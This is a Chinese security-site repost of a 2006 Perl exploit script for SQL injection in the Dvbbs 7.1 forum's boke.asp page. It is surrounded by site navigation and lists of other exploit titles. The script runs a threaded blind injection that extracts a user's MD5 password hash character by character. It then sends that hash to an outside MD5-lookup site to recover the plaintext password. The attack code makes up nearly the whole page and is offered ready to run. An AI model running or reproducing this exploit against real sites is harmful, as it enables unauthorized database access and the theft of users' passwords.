首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dvbbs 7.1 boke.asp SQL Injection Exploit
来源:http://hhuai.cn 作者:Huai_Huai 发布时间:2006-03-10  

#!/usr/bin/perl

#use strict;
use LWP;
use LWP::Simple;
use Thread;
use HTTP::Request::Common;

print <<EOF;

Dvbbs 7.1 boke.asp sqlinject program
Usage: dv.pl http://www.xnanyang.com/bbs/boke.asp admin
Code : Http://hhuai.cn Huai_Huai
EOF

if($#ARGV<1)
{
exit;
}

$kk=get $ARGV[0]."?".$ARGV[1]."'.index.html";
print $kk;
if($kk=~/博客/)
{
print "不存在注入漏洞,程式退出!\n";
exit;
}

$kk=get $ARGV[0]."?".$ARGV[1].".index.html";
if($kk=~/博客統計/)
{
print "存在漏洞和此用戶,開始探測!\n";
}
elsif($kk=~/該博客用戶不存在或填寫的資料有誤/)
{
print "沒有此用戶,程式退出\n";
exit;
}
else
{
print "不存在注入漏洞,程式退出!\n";
exit;
}

@dic=('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

for($i=1;$i<17;$i++)
{
$url[$i]=$ARGV[0]."?".$ARGV[1]."'and'makelove'=mid(password,$i,1)and''='.index.html";
}

for($i=1;$i<17;$i++)
{
$thread[$i]=Thread->new(\&crack,$i);
}
for($i=1;$i<17;$i++)
{
$password.=$thread[$i]->join;
}
print $ARGV[1],"的md5密碼為: $password\n";

print "開始破解md5密碼,請稍候!\n";
my $browser = LWP::UserAgent->new;
my $ua=LWP::UserAgent->new;
$ua->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)');
my $pwd=POST('http://www.mmkey.com/md5/index.asp?action=look',
[md5text=>$password]);
my $response=$ua->request($pwd);

if($response->content=~/<inputsize="32"name="rr2" value="(.+)" >/)
{
print $1,"\n";
}
else
{
print "對不起,查詢不到md5密碼破解!\n";
}

sub crack
{

my $content;
my $num=shift;
my $str=$url[$num];
foreach $md5 (@dic) {
$url[$num]=~s/makelove/$md5/;
 $content=get $url[$num];
if($content=~/博客統計/)
{
print "第$num位為:$md5\n";
return $md5;
last;
}
$url[$num]=$str;
}
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Denial of Service exploit for
·PeerCast nextCGIarg Function R
·Norton AntiVirus Crasher Explo
·PeerCast nextCGIarg Function R
·WordPress DoS Exploit
·Apple OSX Mail.app RFC1740 Rea
·RevilloC Mail Server USER Buff
·Microsoft Windows Telephony Se
·IM Lock Insecure Registry Perm
·KnowledgebasePublisher 1.2 Rem
·RevilloC MailServer 1.x USER C
·MyBB version 1.04 and prior SQ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved